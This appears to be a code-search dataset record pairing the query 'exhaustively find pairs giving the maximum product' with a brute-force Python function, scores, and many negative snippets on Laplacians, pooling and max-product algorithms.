gs.linalg.norm((vertex_0 - vertex_2), axis=-1)\n len_edge_01 = gs.linalg.norm((vertex_0 - vertex_1), axis=-1)\n\n half_perimeter = 0.5 * (len_edge_12 + len_edge_02 + len_edge_01)\n area = gs.sqrt(\n (\n half_perimeter\n * (half_perimeter - len_edge_12)\n * (half_perimeter - len_edge_02)\n * (half_perimeter - len_edge_01)\n ).clip(min=1e-6)\n )\n sq_len_edge_12, sq_len_edge_02, sq_len_edge_01 = (\n len_edge_12 * len_edge_12,\n len_edge_02 * len_edge_02,\n len_edge_01 * len_edge_01,\n )\n cot_12 = (sq_len_edge_02 + sq_len_edge_01 - sq_len_edge_12) / area\n cot_02 = (sq_len_edge_12 + sq_len_edge_01 - sq_len_edge_02) / area\n cot_01 = (sq_len_edge_12 + sq_len_edge_02 - sq_len_edge_01) / area\n cot = gs.stack([cot_12, cot_02, cot_01], axis=1)\n cot /= 2.0\n id_vertices_120 = self.faces[:, [1, 2, 0]]\n id_vertices_201 = self.faces[:, [2, 0, 1]]\n id_vertices = gs.reshape(\n gs.stack([id_vertices_120, id_vertices_201], axis=0), (2, n_faces * 3)\n )\n\n def _laplacian(tangent_vec):\n \"\"\"Evaluate the mesh Laplacian operator.\n\n The operator is evaluated at a tangent vector at point to the\n manifold of DiscreteSurfaces. In other words, the operator is\n evaluated at a vector field defined on the surface point.\n\n Parameters\n ----------\n tangent_vec : array-like, shape=[..., n_vertices, 3]\n Tangent vector to the manifold at the base point that is the\n triangulated surface. 
This tangent vector is a vector field\n on the triangulated surface.\n\n Returns\n -------\n laplacian_at_tangent_vec: array-like, shape=[..., n_vertices, 3]\n Mesh Laplacian operator of the triangulated surface applied\n to one its tangent vector tangent_vec.\n \"\"\"\n to_squeeze = False\n if tangent_vec.ndim == 2:\n tangent_vec = gs.expand_dims(tangent_vec, axis=0)\n to_squeeze = True\n n_tangent_vecs = len(tangent_vec)\n tangent_vec_diff = (\n tangent_vec[:, id_vertices[0]] - tangent_vec[:, id_vertices[1]]\n )\n values = gs.einsum(\n \"bd,nbd->nbd\", gs.stack([gs.flatten(cot)] * 3, axis=1), tangent_vec_diff\n )\n\n laplacian_at_tangent_vec = gs.zeros((n_tangent_vecs, n_vertices, 3))\n\n id_vertices_201_repeated = gs.tile(id_vertices[1, :], (n_tangent_vecs, 1))\n\n for i_dim in range(3):\n laplacian_at_tangent_vec[:, :, i_dim] = gs.scatter_add(\n input=laplacian_at_tangent_vec[:, :, i_dim],\n dim=1,\n index=id_vertices_201_repeated,\n src=values[:, :, i_dim],\n )\n return (\n gs.squeeze(laplacian_at_tangent_vec, axis=0)\n if to_squeeze\n else laplacian_at_tangent_vec\n )\n\n return _laplacian", "def collate_fn(batch):\r\n transposed = zip(*batch)\r\n lbd = lambda batch:torch.cat([torch.from_numpy(b).long() for b in batch])\r\n return [lbd(samples) for samples in transposed]", "def apply3filter(array, filter_):\n s = int(len(filter_)/2)\n width = len(array[0])\n height = len(array)\n new_array = np.array(np.zeros((height,width)))\n for row in range(s, (height-s)):\n for col in range(s, (width-s)):\n new_array[row,col] = np.sum(filter_ * array[(row-s):(row+s+1),(col-s):(col+s+1)])\n return new_array", "def LconvBlock(self, name, kernel_size, is_causal,\n convolution_fn):\n return self._Seq(\n name,\n self.LConv(\n name='lconv',\n kernel_size=kernel_size,\n is_causal=is_causal,\n convolution_fn=convolution_fn),\n self.Feedforward('ff', is_causal))", "def pool_backward(dA, A_prev, kernel_shape, stride=(1, 1), mode='max'):\n sh, sw = stride\n kh, kw = kernel_shape\n m, h_prev, w_prev, c_prev = A_prev.shape\n dm, h_new, w_new, c_new = dA.shape\n dA_prev = np.zeros(A_prev.shape)\n for i in range(m):\n for j in range(h_new):\n for k in range(w_new):\n jsh = j * sh\n ksw = k * sw\n for ll in range(c_new):\n pool = A_prev[i, jsh: jsh + kh, ksw: ksw + kw, ll]\n if mode == 'max':\n maxp = np.amax(pool)\n mask = np.zeros(kernel_shape)\n np.place(mask, pool == maxp, 1)\n dA_prev[i, jsh: jsh + kh, ksw: ksw + kw, ll] += \\\n mask * dA[i, j, k, ll]\n else:\n mask = np.ones(kernel_shape)\n dA_prev[i, jsh: jsh + kh, ksw: ksw + kw, ll] += \\\n mask * dA[i, j, k, ll] / kh / kw\n return dA_prev", "def laplaceianReduce(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n lapLst = []\r\n gauss_pyr = gaussianPyr(img, levels)\r\n\r\n gaussian = gaussianKer(5)\r\n for i in range(1, levels):\r\n expand = gaussExpand(gauss_pyr[i], gaussian)\r\n lap = gauss_pyr[i - 1] - expand\r\n lapLst.append(lap)\r\n\r\n lapLst.append(gauss_pyr[levels - 1])\r\n\r\n return lapLst", "def pool_backward(dA, A_prev, kernel_shape, stride=(1, 1), mode='max'):\n m = dA.shape[0]\n h_new = dA.shape[1]\n w_new = dA.shape[2]\n c = dA.shape[3]\n h_prev = A_prev.shape[1]\n w_prev = A_prev.shape[2]\n kh = kernel_shape[0]\n kw = kernel_shape[1]\n # image_num = np.arange(m)\n sh = stride[0]\n sw = stride[1]\n func = {'max': np.max, 'avg': np.mean}\n\n dA_prev = np.zeros(shape=A_prev.shape)\n\n if mode in ['max', 'avg']:\n for img_num in range(m):\n for k in range(c):\n for i in range(h_new):\n for j in range(w_new):\n window = A_prev[\n 
img_num,\n i * sh: i * sh + kh,\n j * sw: j * sw + kw,\n k\n ]\n if mode == 'max':\n # maxpool returns the max\n # derivative of maxpool relative to the max is 1\n # derivative relative to any other element is 0\n # backpropagate 1 to the unit corresponding to max\n # backpropagate 0 for the other units\n # given these comments, define a mask of 1 and 0s\n mask = np.where(window == np.max(window), 1, 0)\n # print(mask)\n elif mode == 'avg':\n # define a mask weighted by the number of\n # elements in the pooling layer (kh * kw)\n mask = np.ones(shape=window.shape)\n mask /= (kh * kw)\n # print(mask)\n dA_prev[\n img_num,\n i * sh: i * sh + kh,\n j * sw: j * sw + kw,\n k\n ] += mask * dA[\n img_num,\n i,\n j,\n k\n ]\n return dA_prev", "def vector_laplace(arr, out=None):\n laplace_r(arr[0], out=out[0])\n laplace_z(arr[1], out=out[1])\n laplace_phi(arr[2], out=out[2])\n return out", "def pass_through_lateral_conn(self):\n\n if self.conv_filter is not None:\n boundary = 'wrap' if self.circular else 'fill'\n self.P = convolve2d(self.P, self.conv_filter, 'same', boundary)\n\n self.P = self.P / self.P.sum() # rescale to PD", "def cheby_op2(L, c, arange):\r\n if not isinstance(c, list) and not isinstance(c, tuple):\r\n r = cheby_op2(L, [c], arange)\r\n return r[0]\r\n\r\n # L=tf.sparse.to_dense(L)\r\n \r\n \r\n N_scales = len(c)\r\n M = np.array([coeff.size for coeff in c])\r\n max_M = M.max()\r\n\r\n a1 = (arange[1] - arange[0]) / 2.0\r\n a2 = (arange[1] + arange[0]) / 2.0\r\n\r\n Twf_old = 0\r\n Twf_cur = (L-a2*np.identity(L.shape[0])) / a1\r\n r = [0.5*c[j][0]*Twf_old + c[j][1]*Twf_cur for j in range(N_scales)]\r\n\r\n for k in range(1, max_M):\r\n Twf_new = (2/a1) * (L*Twf_cur - a2*Twf_cur) - Twf_old\r\n for j in range(N_scales):\r\n if 1 + k <= M[j] - 1:\r\n r[j] = r[j] + c[j][k+1] * Twf_new\r\n\r\n Twf_old = Twf_cur\r\n Twf_cur = Twf_new\r\n\r\n return r", "def forward_substitution(L, b):\n n = len(L[0])\n z = [0] * n\n for i in range(0, n):\n if L[i][i] != 0:\n accum = 0\n for j in range(0, i):\n accum += L[i][j] * z[j]\n z[i] = (b[i] - accum) / L[i][i]\n return z", "def grad_wrt_L(samples, laplacian, activations, diffusion_factors):\n num_vertices = samples.shape[1]\n grad = np.zeros(shape=(num_vertices, num_vertices))\n eigenvalues, eigenvectors = np.linalg.eigh(laplacian)\n for i, tau in enumerate(diffusion_factors):\n H_tau = activations[:, num_vertices*i:num_vertices*(i+1)]\n A = H_tau.T @ samples\n grad -= 2 * (- tau * grad_tr_A_exp_L(- tau * eigenvalues, eigenvectors, A))\n for j, tau_bis in enumerate(diffusion_factors):\n H_tau_bis = activations[:, num_vertices*j:num_vertices*(j+1)]\n A = H_tau_bis.T @ H_tau\n grad += - ((tau+tau_bis) * grad_tr_A_exp_L(-(tau+tau_bis)*eigenvalues, eigenvectors, A))\n return grad", "def laplacian(expr):\n\n delop = Del()\n if expr.is_Vector:\n return (gradient(divergence(expr)) - curl(curl(expr))).doit()\n return delop.dot(delop(expr)).doit()" ]
[ "0.6398194", "0.6261045", "0.6243763", "0.6211535", "0.6126479", "0.6089628", "0.60353637", "0.59343386", "0.5885602", "0.58751994", "0.5864428", "0.58093095", "0.58002144", "0.5674847", "0.56685555", "0.5641529", "0.55820704", "0.5570494", "0.55570203", "0.5538427", "0.5524708", "0.5521934", "0.5478108", "0.5477927", "0.54581517", "0.54474795", "0.5436212", "0.538979", "0.53010386", "0.5300596", "0.5298834", "0.52281153", "0.5216087", "0.52056825", "0.51712364", "0.5164408", "0.51559913", "0.51457113", "0.51039344", "0.51014024", "0.50954574", "0.5089821", "0.5077068", "0.50744617", "0.5061423", "0.50554407", "0.50389755", "0.5036628", "0.501034", "0.50036573", "0.4974194", "0.49554187", "0.4949169", "0.4943394", "0.49205548", "0.49156746", "0.49038842", "0.4896094", "0.489217", "0.4868009", "0.48662972", "0.48603755", "0.48557913", "0.48468956", "0.48353547", "0.4830262", "0.48215398", "0.48160452", "0.47915566", "0.47858557", "0.47855842", "0.47845635", "0.4784534", "0.47766492", "0.47684708", "0.4766449", "0.47582284", "0.47543415", "0.4747529", "0.47417986", "0.4738708", "0.4734598", "0.47299817", "0.4728574", "0.47239774", "0.47211915", "0.47172034", "0.4714456", "0.4702411", "0.46937096", "0.46862814", "0.46847165", "0.46681297", "0.465735", "0.46573088", "0.46518725", "0.46387663", "0.46379924", "0.46348947", "0.46260944" ]
0.7140893
0
Slow method that exhaustively finds pairs that give the maximum product
def max_pairwise_product(numbers): n = len(numbers) max_product = 0 for first in range(n): for second in range(first + 1, n): max_product = max(max_product, numbers[first] * numbers[second]) return max_product
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def max_pairwise_product_brute_force(array):\n\n if len(array) <= 1:\n return 0\n\n max_product = 0\n\n for i in range(len(array)):\n for j in range(len(array)):\n if i != j:\n if array[i] * array[j] > max_product:\n max_product = array[i] * array[j]\n\n return max_product", "def max_pairwise_product_fast(numbers):\n num_list = numbers.copy()\n max_num_1 = max(num_list)\n num_list.remove(max_num_1)\n max_num_2 = max(num_list)\n ans = max_num_1*max_num_2\n return ans", "def max_pairwise_product_linear(array):\n\n if len(array) <= 1:\n return 0\n\n two_biggest_values = [0, 0]\n\n for element in array:\n if element > two_biggest_values[0]:\n two_biggest_values[0] = element\n elif element > two_biggest_values[1]:\n two_biggest_values[1] = element\n\n return two_biggest_values[0] * two_biggest_values[1]", "def maxProduct(data):\n maxval = float('-inf')\n for i in range(len(data)):\n for j in range(i+1, len(data)):\n if maxval < data[i]*data[j]:\n maxval = data[i]*data[j]\n a,b = (data[i],data[j])\n return tuple([a,b])", "def maximumProduct2(self, nums: List[int]) -> int:\n big_1 = big_2 = big_3 = -float(\"inf\")\n small_1 = small_2 = float(\"inf\")\n for n in nums:\n if n >= big_1:\n big_1, big_2, big_3 = n, big_1, big_2\n elif n >= big_2:\n big_2, big_3 = n, big_2\n elif n >= big_3:\n big_3 = n\n \n if n <= small_1:\n small_1, small_2 = n, small_1\n elif n <= small_2:\n small_2 = n\n \n return max(big_1 * big_2 * big_3, big_1 * small_1 * small_2)", "def max_pairwise_product_sort(numbers):\n sorted_list = sorted(numbers)\n ans = sorted_list[-1]*sorted_list[-2]\n return ans", "def max_pairwise_product_sort(array):\n if len(array) <= 1:\n return 0\n\n array.sort()\n\n return array[-1] * array[-2]", "def findMaxProduct(n):\n large = 0\n for i in range(len(s)):\n p = 1\n number = s[i:i+n]\n for iteration in range(len(number)):\n h = number[iteration]\n p = p * int(h)\n if p > large:\n large = p\n\n \n return large", "def highest_product_2(arr):\n\n # make a list to store the highest three ints, initializing to first three\n maxes = [arr[0], arr[1], arr[2]]\n\n # find the lowest of the highest three ints\n lowest_max = min(maxes)\n\n # go through the rest of the list to check for higher values\n for num in arr[3:]:\n # if any value is higher than the lowest max, update maxes list\n if num > lowest_max:\n # remove the old maximum\n maxes.remove(lowest_max)\n # add the new one\n maxes.append(num)\n # recalculate the lowest max for continued comparison\n lowest_max = min(maxes)\n\n return maxes[0] * maxes[1] * maxes[2]", "def test_returns_largest_product_within_array(self):\n result = max_product([2,3,-2,4,10,-5,3,2,1])\n self.assertEqual(result, 14400)", "def maxProduct2(nums):\n\n maxSubseq = nums[0]\n minSubseq = nums[0]\n res = nums[0]\n for i in range(1, len(nums)):\n if nums[i] < 0:\n minSubseq, maxSubseq = maxSubseq, minSubseq\n maxSubseq = max(nums[i], maxSubseq*nums[i])\n minSubseq = min(nums[i], minSubseq*nums[i])\n res = max(res, maxSubseq)\n return res", "def find_max_product(mtx):\n max_prod = 0\n for row_num in range(20):\n vert = 0\n diag = 0\n anti_diag = 0\n horiz = horiz_max(mtx[row_num])\n if row_num < len(mtx) - 3:\n vert = vert_max(mtx[row_num], mtx[row_num + 1],\n mtx[row_num + 2], mtx[row_num + 3])\n diag = diag_max(mtx[row_num], mtx[row_num + 1],\n mtx[row_num + 2], mtx[row_num + 3])\n anti_diag = anti_diag_max(mtx[row_num], mtx[row_num + 1],\n mtx[row_num + 2], mtx[row_num + 3])\n max_prod = max(max_prod, horiz, vert, diag, anti_diag)\n return max_prod", "def 
compute_largest_diagonal2_product(grid):\n max_product = 0\n for row in range(len(grid) - 1 , 2 , -1):\n for column in range(len(grid) - 3):\n current_product = 1\n for j in range(4):\n current_product *= grid[row - j][column + j]\n if current_product > max_product:\n max_product = current_product\n\n if current_product == 70600674:\n print(row , column)\n return max_product", "def highest_product(arr):\n\n product = 1\n\n for i in range(3):\n # find the max value in the list, get the index, pop it, and mulitply\n product *= arr.pop(arr.index(max(arr)))\n\n return product", "def solve_bruteforce(self):\n max_value = -1\n for z in range(0, self.k):\n max_value = -1\n max_index = -1\n for i, v in enumerate(self.numbers):\n if v > max_value:\n max_index = i\n max_value = v\n del self.numbers[max_index]\n\n return max_value", "def maximumProduct1(self, nums: List[int]) -> int:\n s_nums = sorted(nums, reverse=True)\n return max(s_nums[0] * s_nums[1] * s_nums[2], s_nums[0] * s_nums[-1] * s_nums[-2])", "def compute_largest_product(grid):\n row_largest = compute_largest_row_product(grid)\n column_largest = compute_largest_column_product(grid)\n diagonal1_largest = compute_largest_diagonal1_product(grid)\n diagonal2_largest = compute_largest_diagonal2_product(grid)\n\n my_list = [row_largest , column_largest , diagonal1_largest , diagonal2_largest]\n return max(my_list)", "def compute_largest_column_product(grid):\n max_product = 0\n for column in range(len(grid)):\n for row in range(len(grid) - 3):\n current_product = 1\n for j in range(4):\n current_product *= grid[row + j][column]\n if current_product > max_product:\n max_product = current_product\n return max_product", "def __pair_maximizer(alpha_pairs, pair):\n for alt in alpha_pairs:\n if pair != alt and pair[0].issubset(alt[0]) and pair[1].issubset(alt[1]):\n return False\n return True", "def largest_product(series, length):\n\tif length > len(series):\n\t\traise ValueError\n\tif length == 0 and len(series)==0:\n\t\treturn 1\n\treturn max((reduce(mul,s) for s in slices(series,length)))", "def test_many_positive(self):\n\n # pairs (input, result)\n pairs = [\n ([3, 4, 6, 8, 0], 192),\n ([1, -1, 1, -1, 1], 1),\n ([0, 0, 0, 0, -1], 0),\n ([6, 5, 4, 3, 2], 120),\n ([6, 5, 4, 3, -2], 120),\n ([6, 5, 4, -3, -2], 120),\n ([-6, -5, 4, 3, 0], 120),\n ([-6, 5, 4, 3, 2], 60),\n ([5, 6, -100, -1, 10], 1000)\n ]\n\n for lst, result in pairs:\n self.assertEqual(max_triple_mul(lst), result)", "def highest_product_3(arr):\n # sort in place (this will take O(n), at least)\n arr.sort()\n\n # get the maximum positive solution (this only works if all three > 0)\n max_product = arr[-1] * arr[-2] * arr[-3]\n\n # check for better solutions involving negatives\n # the only solution involving negatives will have exactly two of them\n # check the two options manually and return the largest one. 
\n if arr[0] < 0 and arr[1] < 0:\n if arr[0] * arr[1] * max(arr[-1], arr[-2], arr[-3]) > max_product:\n max_product = arr[0] * arr[1] * max(arr[-1], arr[-2], arr[-3])\n\n return max_product", "def get_max_combination(total_cuts):\n max_pieces = 0\n for i in range(total_cuts):\n result = i * (total_cuts - i)\n if result > max_pieces:\n max_pieces = result\n print(max_pieces)", "def effective_pairs(self):\n out = 0\n hdmat = self.hdmatrix()\n for i in xrange(len(hdmat[0])):\n for j in xrange(i+1, len(hdmat[0])): \n out += hdmat[i,j]**2\n return out", "def maxElem(A):\n n = len(A)\n AMax = 0.0\n for i in range(n):\n for j in range(i+1,n):\n if abs(A[i,j]) >= AMax:\n AMax = abs(A[i,j])\n k = i;l = j\n return AMax, k, l", "def calculateOptimal(self) -> (list, int):\n\t\tcombinations = list(itertools.product(*self.clusters))\n\t\tmin_dist = 1000000\n\t\tmin_combination = None\n\t\tfor combination in combinations:\n\t\t\tdist = super().step(combination)\n\t\t\tif(dist < min_dist):\n\t\t\t\tmin_dist = dist\n\t\t\t\tmin_combination = combination\n\t\treturn (min_combination, min_dist)", "def test_largest_product_negative():\n assert largest_product([[-1, -2], [-3, -4], [-5, -6], [-7, -8]]) == 56", "def max_product(s):\n # if s == []:\n # return 1\n # elif s[0] in s[2:]:\n # products = [s[0] ** s.count(s[0])]\n # else:\n # products = [s[0] * max(s[2:])]\n # return max(products)\n if s == []:\n return 1\n # elif len(s) == 1:\n # return s[0]\n else:\n return max(s[0] * max_product(s[2:]), max_product(s[1:]))", "def answer(n_digits):\n\n best = 0\n pairs = combinations(xrange(10 ** (n_digits - 1), 10 ** (n_digits)), 2)\n\n for (x, y) in pairs:\n prod = str(x * y)\n if prod == prod[::-1]:\n best = max(best, x * y)\n\n return best", "def pair(dice):\n\n def max_or_zero(list):\n \"\"\" Returns maximum value of a list; 0 if list is empty. 
\"\"\"\n try:\n return max(list)\n except ValueError:\n return 0\n\n return 2 * max_or_zero([i for i, j in combinations(dice, 2) if i == j])", "def get_best(pairs, hyplo_dict):\r\n\tbest_freq=0\r\n\tbest_pair=[]\r\n\t# print \"the pairs: \", pairs\r\n\tfor p in pairs:\r\n\t\tfreq=hyplo_dict[p[0]]*hyplo_dict[p[1]]\r\n\t\tif freq>best_freq:\r\n\t\t\tbest_freq=freq\r\n\t\t\tbest_pair=p\r\n\t# print best_pair\r\n\t# print \"the best pair is: \",best_pair\r\n\treturn best_pair", "def problem():\n\n print 'problem #27'\n\n l = 0\n m_a = 0\n m_b = 0\n for a in xrange(-1000, 1000):\n for b in xrange(-1000, 1000):\n p = len(check(a, b))\n if p > l:\n l = p\n m_a = a\n m_b = b\n\n print 'the product of coefficients is %s' % (m_a * m_b)", "def test_largest_product_array():\n assert largest_product([[1, 2], [3, 4], [5, 6], [7, 8]]) == 56", "def maxProfit(self, prices):\n np = 0\n p = float('-inf')\n cd = float('-inf')\n for price in prices:\n p, np, cd = max(np - price, p), max(np, cd), p + price\n return max(np, cd)", "def maxResult(self, nums: List[int], k: int) -> int:\n # Solution 1 - 964 ms\n # Solution 2 - 864 ms\n n = len(nums)\n if n == 0:\n return 0\n if n == 1:\n return nums[0]\n\n dp = [0] * n\n dp[0] = nums[0]\n max_sum = dp[0]\n max_sum_pointer = 0\n for i in range(1, n):\n if max_sum_pointer >= i - k:\n if max_sum < dp[i - 1] and i > 0:\n max_sum = dp[i - 1]\n max_sum_pointer = i - 1\n else:\n if i - k > 0:\n max_sum = dp[i - k]\n max_sum_pointer = i - k\n for p in range(i - k, i):\n if max_sum <= dp[p]:\n max_sum = dp[p]\n max_sum_pointer = p\n\n dp[i] = max_sum + nums[i]\n\n dp[-1] = max_sum + nums[-1]\n return dp[-1]", "def find_greatest_product(n, t_num):\n t_seqs = []\n zero_idx = [i for i, x in enumerate(t_num) if x == \"0\"]\n initial_zero = [-1] + zero_idx\n end_zero = zero_idx + [len(t_num)]\n zero_dist = map(lambda x, y: y - (x + 1), initial_zero, end_zero)\n for idx in range(len(zero_dist)):\n if zero_dist[idx] >= n:\n init_seq_idx = initial_zero[idx] + 1\n end_seq_idx = init_seq_idx + n\n while end_seq_idx <= end_zero[idx]:\n t_seqs.append(t_num[init_seq_idx:end_seq_idx])\n init_seq_idx += 1\n end_seq_idx += 1\n max_mul = 0\n for seq in t_seqs:\n seq_mul = reduce(lambda x, y: int(x) * int(y), seq)\n if seq_mul > max_mul:\n max_mul = seq_mul\n return max_mul", "def find_max_triples(p1, p2, topN=5, prob_thd=None):\n product = torch.bmm(p1.unsqueeze(2), p2.unsqueeze(1))\n upper_product = torch.stack([torch.triu(p) for p in product]).data.cpu().numpy()\n batched_sorted_triple = []\n for idx, e in enumerate(upper_product):\n sorted_triple = topN_array_2d(e, topN=topN)\n if prob_thd is not None:\n sorted_triple = [t for t in sorted_triple if t[2] >= prob_thd]\n batched_sorted_triple.append(sorted_triple)\n return batched_sorted_triple", "def findMaximal(freqSet):", "def find_largest_square(serial):\n max_size = 1\n max_square = None\n max_power = -float('inf')\n\n # Precompute all single cell powers\n powers = []\n for y in range(300):\n powers.append([])\n for x in range(300):\n powers[y].append(cell_power(x+1, y+1, serial))\n\n # Memoize the total powers of squares of previous steps\n previous_power = copy.deepcopy(powers)\n\n for size in range(1, 300):\n x = y = 1\n while x + size <= 300:\n while y + size <= 300:\n power = previous_power[y-1][x-1]\n if size != 1:\n # Add the new row/column\n for i in range(x, x + size):\n power += powers[y+size-2][i-1]\n # Do not add the corner twice\n for j in range(y, y + size - 1):\n power += powers[j-1][x+size-2]\n # Update the map\n 
previous_power[y-1][x-1] = power\n\n if power > max_power:\n max_power = power\n max_square = (x, y)\n max_size = size\n y += 1\n x += 1\n y = 1\n\n return max_square, max_size", "def twoMaxs(lnp):\n\tindex1 = 0\n\tindex2 = 0\n\tcnt = 0\n\tmaxArea = 0\n\tmaxArea2 = 0\n\tfor (ex, ey, ew, eh) in lnp:\n\t\tif(ew * eh >= maxArea):\n\t\t\tindex1 = cnt\n\t\t\tmaxArea = ew * eh\n\t\tcnt += 1\n\t\n\n\tcnt = 0\n\tfor (ex, ey, ew, eh) in lnp:\n\t\tif(index1 == cnt):\n\t\t\tcnt += 1\n\t\t\tcontinue\n\t\tif(ew * eh >= maxArea2):\n\t\t\tindex2 = cnt\n\t\t\tmaxArea2 = ew * eh\n\t\tcnt +=1\n\t\n\treturn (index1, index2)", "def problem41():\n for i in range(len(PANDIGITAL), 1, -1):\n cur_max = 0\n for p in itertools.permutations(PANDIGITAL[:i]):\n n = int(\"\".join(p))\n if pelib.is_prime(n) and n > cur_max:\n cur_max = n\n\n if cur_max > 0:\n return cur_max", "def find_max_independent_set(graph, params):\r\n\r\n max_ind_set = []\r\n\r\n # QHACK #\r\n\r\n # function that takes in a graph and outputs the hamiltonians\r\n cost_h, mixer_h = qaoa.max_independent_set(graph, constrained=True) # Assume the graph they give me is good\r\n\r\n def qaoa_layer(gamma, alpha):\r\n qaoa.cost_layer(gamma, cost_h)\r\n qaoa.mixer_layer(alpha, mixer_h)\r\n\r\n dev = qml.device(\"default.qubit\", wires=range(NODES))\r\n\r\n def circuit(params, **kwargs): \r\n qml.layer(qaoa_layer, N_LAYERS, params[0], params[1]) \r\n\r\n @qml.qnode(dev)\r\n def probability_circuit(gamma, alpha):\r\n circuit([gamma, alpha])\r\n return qml.probs(wires=range(NODES))\r\n\r\n answer = probability_circuit(params[0], params[1])\r\n\r\n maxn = 0\r\n maxn = max(answer)\r\n\r\n for i in range(len(answer)):\r\n if maxn == answer[i]:\r\n decimal = i\r\n \r\n binary_num = []\r\n def DecimalToBinary(decimal):\r\n if decimal >= 1:\r\n DecimalToBinary(decimal // 2)\r\n binary_num.append(decimal % 2)\r\n \r\n DecimalToBinary(decimal)\r\n\r\n if len(binary_num) < 6:\r\n if len(binary_num) < 5:\r\n if len(binary_num) < 4:\r\n if len(binary_num) < 3:\r\n if len(binary_num) < 2:\r\n binary_num.insert(0, 0) # At beginning append 0\r\n binary_num.insert(0, 0)\r\n binary_num.insert(0, 0)\r\n binary_num.insert(0, 0)\r\n binary_num.insert(0, 0)\r\n\r\n for i in range(6):\r\n if binary_num[i] == 1:\r\n max_ind_set.append(i)\r\n\r\n # QHACK #\r\n\r\n return max_ind_set", "def max_overlap_pair(skylines):\n max_pair = None\n max_overlap_area = 0.0\n\n for i in range(len(skylines) - 1):\n curr_s = skylines[i]\n next_s, i_area = curr_s.find_max_overlap(skylines[i + 1:])\n\n if i_area > max_overlap_area:\n max_overlap_area = i_area\n max_pair = (curr_s, next_s)\n\n return max_pair", "def find_triplet(numbers, target_sum):\n # iterate through all pair combinations (cartesian product), so that we don't need to nest 2 loops\n for num_1, num_2 in product(numbers, numbers):\n partner_num = target_sum - num_2 - num_1\n\n # leave early if partner would be negative (only tiny speedup, but still)\n if partner_num < 0:\n continue\n\n if partner_num in numbers:\n return partner_num * num_1 * num_2", "def test_with_negative(self):\n inp = [5, 6, 7, -100, -10, 0]\n result = max_triple_mul(inp)\n\n self.assertEqual(result, 7000)\n self.assertNotEqual(result, 210)", "def max_non_adjacent_sum_memoized(a):\n table = dict()\n def helper(a, table, i):\n if i in table:\n return table[i]\n if len(a) - i == 0:\n table[i] = 0\n elif len(a) - i == 1:\n table[i] = a[i]\n elif len(a) - i == 2:\n table[i] = max(a[0], a[1])\n else:\n table[i] = max(a[i] + helper(a, table, i + 2),\n a[i + 1] + 
helper(a, table, i + 3))\n return table[i]\n return helper(a, table, 0)", "def find_max_triples_from_upper_triangle_product(upper_product, top_n=5, prob_thd=None):\n batched_sorted_triple = []\n for idx, e in enumerate(upper_product):\n sorted_triple = top_n_array_2d(e, top_n=top_n)\n if prob_thd is not None:\n sorted_triple = sorted_triple[sorted_triple[2] >= prob_thd]\n batched_sorted_triple.append(sorted_triple)\n return batched_sorted_triple", "def maxproba(proba):\r\n lenp = len(proba)\r\n m=0\r\n for i in range(0,lenp):\r\n if proba[i]>m:\r\n m=proba[i]\r\n im=i\r\n return im,m", "def brute_force_solution():\n def is_pythagorean_triplet(a, b, c):\n return c**2 == a**2 + b**2\n\n return next(\n a * b * (TRIPLET_SUM - a - b)\n for a in range(1, TRIPLET_SUM)\n for b in range(a + 1, TRIPLET_SUM - a)\n if is_pythagorean_triplet(a, b, TRIPLET_SUM - a - b)\n )", "def get_longest_all_primes(lst: list[int]):\n subsecventa_max1 = []\n for i in range(len(lst)):\n for j in range(len(lst)):\n if toate_elementele_prime(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventa_max1):\n subsecventa_max1 = lst[i:j + 1]\n return subsecventa_max1", "def compute_largest_diagonal1_product(grid):\n max_product = 0\n for row in range(len(grid) - 3):\n for column in range(len(grid) -3):\n current_product = 1\n for j in range(4):\n current_product *= grid[row + j][column + j]\n if current_product > max_product:\n max_product = current_product\n return max_product", "def maxProfit(prices, k):\n buys, sells = [-sys.maxsize] * k, [-sys.maxsize] * k\n for price in prices:\n for i, (buy, sell) in enumerate(zip(buys, sells)):\n if i == 0:\n buys[i] = max(buy, -price)\n sells[i] = max(sell, buy+price)\n else:\n buys[i] = max(buy, sells[i-1]-price)\n sells[i] = max(sell, buy+price)\n return max(sells)", "def greatest_pallindrome(n, m):\n if m < n:\n raise ValueError\n\n pk = ProductKeeper()\n\n # these nested loops compare distinct pairs of products\n for i in range(n + 1, m + 1):\n for j in range(n, i):\n pk.check(i, j)\n\n return pk.get_gp()", "def max_v_greedy():\n\n S1=Spectrum.Spectrum()\n S1.add_peak(50.4,16)\n S1.add_peak(50.7,36)\n S1.add_peak(74.8,25)\n S1.add_peak(96.2,23)\n S1.pep_mass=100\n S1.euclidean_scale()\n\n S2=Spectrum.Spectrum()\n S2.add_peak(50.6,49)\n S2.add_peak(50.9,25)\n S2.add_peak(74.6,9)\n S2.add_peak(102.4,17)\n S2.pep_mass=100\n S2.euclidean_scale()\n\n score,peaks=similarity.cosine_score_max(S1,S2)\n g_score,g_peaks=similarity.cosine_score_greedy(S1,S2)\n\n assert score>=g_score, \"Maximum weighted method did not get higher score than greedy method\"\n assert peaks>=g_peaks, \"Maximum weighted method did not match more peaks than greedy method\"\n\n assert peaks==3, \"Incorrect number of peaks matched with greedy method\"\n assert math.isclose(score,0.73), \"Incorrect score with greedy method\"\n\n assert g_peaks==2, \"Incorrect number of peaks matched with maximum weighted method\"\n assert math.isclose(g_score,0.57), \"Incorrect score with maximum weighted method\"", "def find_optimal_dimensions_wrong(self):\n\n min_product_index = 0\n min_product = self.ans[0][0]*self.ans[0][1]\n\n for i in range(0,len(self.ans),1):\n if self.ans[i][0]*self.ans[i][1] < min_product or min_product == 0:\n min_product = self.ans[i][0]*self.ans[i][1]\n min_product_index = i\n\n print(i, \":\", self.ans[min_product_index])\n\n return self.ans[min_product_index]", "def maxProfit(self, prices):\n l = len(prices)\n if l <= 1:\n return 0\n dp = [0] * len(prices)\n r = prices[1] - prices[0]\n m = prices[0]\n for 
